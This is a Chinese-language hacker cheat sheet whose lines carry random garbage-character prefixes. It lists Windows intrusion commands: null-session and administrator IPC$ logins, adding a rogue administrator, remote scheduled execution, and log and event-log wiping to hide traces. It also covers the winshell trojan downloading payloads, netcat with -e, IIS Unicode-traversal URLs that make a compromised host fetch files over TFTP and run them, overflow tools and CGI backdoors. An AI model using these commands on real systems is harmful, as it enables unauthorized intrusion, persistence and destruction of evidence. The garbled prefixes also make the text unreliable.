网管和黑客都必须知道的命令
K1q�+~4>\| 常用的几条NET命令:
D"l�+iVbBP j^�SZnMQf� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
X.#oEmA�,P ;L"�!I3dM) (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
|:[9O`�U)s Z�i
�ESlf$ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
��|a(fejO3 #�h'@5 �l� (查看远程主机时间) net time \\IP地址
:td ��~g;w N4{nG,Mo�] (定时启动某个程序) at \\IP地址 02:18 readme.exe
s] au/T�6b �4I�sG=7 � (查看共享) net view \\IP地址
Fo|xzLm9*| jna�;0�)�� (查看netbios工作组列表) nbtstat -A IP地址
07_oP(�;jT !a-�b6A�a� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
mG2'Y)�S�z E4oz�|�2!m (这两条把自己增加到管理员组): net user 用户名 密码 /add
m&Y��i!7@( jai|/"HSXw net localgroup Administrators 用户名 /add
;_"U "?h_J �+��c$I&JO (断开连接) net use \\IP地址\ipc$ /delete
#�@f[�bP}a w��WjG
JvJ 扫尾:
m7jA
,~O�� o�y\B;aA�K del C:\winnt\system32\logfiles\*.*
H3KTi�r"on ��o�(�G�"k del C:\winnt\ssytem32\config\*.evt
��xvm�5��� �h5~n� 1qX del C:\winnt\system32\dtclog\*.*
�q�31�>uF� Sre�YJT��% del C:\winnt\system32\*.log
c$H+g,7xQ- p]�gT&[iJ� del C:\winnt\system32\*.txt
:E_�a�0�!' j,-C�{ �K� del C:\winnt\*.txt
/iQ�(3�F�� �m
Vx�O$A, del C:\winnt\*.log
ZFn�(x��*L 0Y+FRB�]u 一、netsvc.exe
${r[!0|��� /��n�{1o�\ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
`=)2<Ca;~@ r@}��bD�kx netsvc /list \\IP地址
xyeA����2Y >hsuAU.UOR netsvc schedule \\IP地址 /query
[~���mGsXV =�JO^XwUOo netsvc \\IP地址 schedule /start
�P�af%�rv2 |�%7c�dMC� 二、OpenTelnet.exe
�`:�|@�Zln -�1%O�lK�C 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Lxe^v/�LsT �!!�,0'�c� OpenTelnet \\IP地址 用户名 密码 1 7878
OSDy'�@�
� �\=e8%.#@J 然后就可以telnet到主机的7878端口,进入DOS方式下:
/bVZ::A&�_ YZwaD�� b� telnet IP地址 7878
x4kWLy7�Sz /@oLe[Mz$� 三、winshell.exe
�c� z�'5iK �Ao��.��\� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
2W<n5o �� <z)m%*l�vU p Path (查看winshell主程序的路径信息)
g�.DLfwI| qR�B7E�c�_ b reBoot (重新启动机器)
�D��txE@�, )P
Jw+�5�� d shutDown (关闭机器)
>)nS2�b�OE t;q�7t!sC] s Shell (执行后你就会看到可爱的“C:\>”)
�n��v�q3*� X`�r*���ob x eXit (退出本次登录会话,此命令并不终止winshell的运行)
:}}%#�/nd ��R)8���s
CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�|�(R5�e� '-��P�C7"o 四、3389登陆器,GUI方式登录远程主机的
gX ��@`X�� �Qfp�uZEUK 五、elsave.exe
Hh[T�w&�J4 lFG9=�W��f 事件日志清除工具
fb�]�S-z�( :7.Me�;R�A elsave -s \\IP地址 -l "application" -C
a:rX�9-�** ?�A*Kg;I�U elsave -s \\IP地址 -l "system" -C
{3\R|tZh,` wxQ>i�fi9Z elsave -s \\IP地址 -l "security" -C
�%j,i�AUE< ^rAa"�p�9� 执行后成功清除应用程序日志,系统日志,安全日志
}d
A��d$�^ k3Cz�9Vt%� 六、hbulot.exe
i775:j~zx0 �@�R�6 ttx 开启win2kserver和winxp的3389服务
,J��=P,]�( YV'pVO'_+� hbulot [/r]
��~2�*9{ �_S?qDG{E| 使用/r表示安装完成后自动重起目标使设置生效。
��/YKMK�tE �OYL�]j�{� 七、nc.exe(netcat.exe)
Z=�z�%$��l s9�5�F#>dr 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
m�?CZ�Qq�, 4mYCSu14:` 想要连接到某处: nc [-options] hostname port[s] [ports] ...
?8�V�
UO�x epD?�K��� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
@�tUo�D>f� �"j�g@w�%~ 参数:
+b$S~�0n
� #CUz��u�k& -e prog 程序重定向,一旦连接,就执行 [危险!!]
QV|>4�^1D� ��[:;# �]? -g gateway source-routing hop point[s], up to 8
C"�uahP[Y� Zk-~a�r�� -G num source-routing pointer: 4, 8, 12, ...
�0"WDH)7hJ 7
h=Q��W�5 -h 帮助信息
KM,|} .@�: �e�79Kb�LV -i secs 延时的间隔
X JGB)3�QI �
^z;JVrW -l 监听模式,用于入站连接
r`'y?Br�a; ub�:ly0;t -n 指定数字的IP地址,不能用hostname
�D�)$8��W[ a�E��VsU|
-o file 记录16进制的传输
r|<DqTc�6l Ww3w�sy��x -p port 本地端口号
2�B1xUj �] X���$?3U! -r 任意指定本地及远程端口
=6 r:A<F!n 7N8�H)�X� -s addr 本地源地址
r�4}�*l�7Q a��|j�%�n� -u UDP模式
0S/'�
94%w r�VSZ.�+n
-v 详细输出——用两个-v可得到更详细的内容
`���u'bRp ]c)_&{:V�� -w secs timeout的时间
MH�j,<�|8Q Q\Kx"�Y3�i -z 将输入输出关掉——用于扫描时
��Td\o�9�� 八、TFTPD32.EXE
'cZN{ZMWG� TYn�s~X_PR 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
"h�"�NW�[R L5fuM�]G�` http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
g(x9S'H3l� Of}|�ib^t 然后可以直接令文件运行:
k\r(=cex6 T�)~9�W�ac http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
/*)�Tl� � %D�}H|*IPu 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
��*U�s�t[u W
!}��{$�� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
"U�VFU-�Z� v�}JD2.O+ 一、一 Xscan命令行运行参数说明:
+/{L#e>�� hc�Cp�,b 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
6�i@\�5}m= V�y�<��HA* 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�xG2F!�WeF o�:q1�b�eU xscan -file <主机列表文件名> <检测项目> [其他选项]
t�~7V�{ xk �z�;��\d�L 其中<检测项目> 含义如下:
��bO5k�6�i �w(d>HH��g -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�25y�6a|�` Ucw �yxX�I -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
_X�cn
N:Rt `\u;K9�S6� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
G��bP!9I� [V8�fu
qE> -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
E�-��5_{sc �E �]9�\R� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
L�v�[OUW#S d@C&+#QD�F [其他选项] 含义如下:
��� )�v4b� \00DqL(Oj` -v: 显示详细扫描进度
v�xQ8t!-u ��~V=<3��X -p: 跳过Ping不通的主机
>x1p%^cA;= ao�lN<�u3G -o: 跳过没有检测到开放端口的主机
��#K\?E.9h �!9iGg*0dx -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
